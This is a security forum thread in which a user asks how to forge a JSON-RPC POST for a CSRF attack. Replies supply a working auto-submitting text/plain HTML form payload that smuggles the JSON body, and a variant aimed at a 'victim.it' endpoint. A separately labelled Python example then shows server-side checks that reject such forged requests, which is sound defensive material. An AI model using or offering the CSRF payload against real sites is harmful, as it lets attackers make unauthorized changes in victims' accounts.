Sla.ckers.org: Q and A for any cross site scripting information. Feel free to ask away.
Help sending json object
Posted by: acemutha
Date: January 13, 2010 10:42AM

Hi all, I know very little about JSON and I'd like to ask you if it's possible to replay a JSON POST request like:

{id:8,method:"contentBridge.setComponentValue",params:["7.92998", "name", "Welcome", "", {"javaClass": "java.util.HashMap", "map": {"en": false, "es": false, "de": false, "fr": false}}]}

The aim would be to try a CSRF attack.
I thought about jsonrequest.post, but actually I don't know how.

Thanks in advance

Re: Help sending json object
Posted by: sirdarckcat
Date: January 13, 2010 09:11PM

Yes, it is possible:
<form enctype="text/plain">
<input name='{x:"' value='",id:8,method:"contentBridge.setComponentValue",params:["7.92998", "name", "Welcome", "", {"javaClass": "java.util.HashMap", "map": {"en": false, "es": false, "de": false, "fr": false}}]}'>
</form>
<script>document.forms[0].submit()</script>

Greetings!!

--------------------------------
http://sirdarckcat.blogspot.com/ http://www.sirdarckcat.net/ http://foro.elhacker.net/ http://twitter.com/sirdarckcat

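Added example, not from this thread or from the application it mentions: the server-side checks that reject a text/plain form post of the kind shown above, in Python. A text/plain form submission arrives as `name=value` followed by a CRLF with a `Content-Type: text/plain` header, and a browser form can neither set a JSON content type nor add a custom header, so an endpoint that insists on both and parses the body as strict JSON never sees the forged call. The function `accept_jsonrpc`, the two sample requests and the header names are constructed for illustration and assume an endpoint that can inspect raw headers and body.

```python
import json
from typing import Mapping, Tuple

# Constructed sample: what the browser sends for the text/plain form above.
# The name/value split around the quote character yields a JavaScript-style
# object literal (unquoted keys, a stray "x" member), not strict JSON.
FORM_HEADERS = {"Content-Type": "text/plain"}
FORM_BODY = (
    '{x:"=",id:8,method:"contentBridge.setComponentValue",'
    'params:["7.92998", "name", "Welcome", "", '
    '{"javaClass": "java.util.HashMap", "map": {"en": false}}]}\r\n'
)

# Constructed sample: the same call issued by the site's own script through
# XMLHttpRequest, which can set a JSON content type and a custom header.
XHR_HEADERS = {"Content-Type": "application/json",
               "X-Requested-With": "XMLHttpRequest"}
XHR_BODY = json.dumps({
    "id": 8,
    "method": "contentBridge.setComponentValue",
    "params": ["7.92998", "name", "Welcome", "",
               {"javaClass": "java.util.HashMap", "map": {"en": False}}],
})

ALLOWED_KEYS = {"id", "method", "params"}


def accept_jsonrpc(headers: Mapping[str, str], body: str) -> Tuple[bool, str]:
    """Return (accepted, reason) for an incoming JSON-RPC request.

    Assumed policy: each check on its own blocks a cross-site HTML form;
    together they give defence in depth and a reason string for logging.
    """
    # Header names are case-insensitive on the wire.
    h = {k.lower(): v for k, v in headers.items()}

    # 1. HTML forms can only produce urlencoded, multipart or text/plain.
    ctype = h.get("content-type", "").split(";")[0].strip().lower()
    if ctype != "application/json":
        return False, f"content-type {ctype!r} is not application/json"

    # 2. A custom header cannot be set by a form; cross-origin script would
    #    trigger a CORS preflight that this endpoint does not answer.
    if h.get("x-requested-with") != "XMLHttpRequest":
        return False, "missing X-Requested-With header"

    # 3. Strict JSON parsing rejects unquoted keys and other literal tricks
    #    that lenient JavaScript-style parsers would swallow.
    try:
        req = json.loads(body)
    except json.JSONDecodeError as exc:
        return False, f"body is not strict JSON: {exc.msg}"

    # 4. Only the expected envelope is accepted; extra members are refused.
    if not isinstance(req, dict) or not set(req) <= ALLOWED_KEYS:
        return False, "unexpected top-level keys"
    if not isinstance(req.get("method"), str) or not isinstance(req.get("params"), list):
        return False, "malformed method or params"
    return True, "ok"


if __name__ == "__main__":
    for label, hdrs, body in (("form", FORM_HEADERS, FORM_BODY),
                              ("xhr", XHR_HEADERS, XHR_BODY)):
        print(label, accept_jsonrpc(hdrs, body))
```

The content-type check alone stops the form in the thread, but the custom-header requirement is the one that keeps holding if a later feature starts accepting other body encodings, and strict parsing is what stops the `{x:"...` wrapping from being read as a valid call by a lenient parser.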
Re: Help sending json object
Posted by: acemutha
Date: January 14, 2010 03:58AM

Thanks for the answer, but I slightly modified it to suit my needs, to test it without the auto-submit, like this:

<form enctype="text/plain" method="post" action="http://victim.it/jsonrpc">
<input name='{x:"' value='",id:8,method:"contentBridge.setComponentValue",params:["7.92998", "name", "Welcome", "", {"javaClass": "java.util.HashMap", "map": {"en": false, "es": false, "de": false, "fr": false}}]}'>
<input type="submit" value="INVIA"/>
</form>

BUT...
It asks me to download the file jsonrpc.
Any clues??



Edited 1 time(s). Last edit at 01/14/2010 04:13AM by acemutha.

Re: Help sending json object
Posted by: sirdarckcat
Date: January 14, 2010 04:55AM

Try to post to view-source. I've never tried it, but it may work.

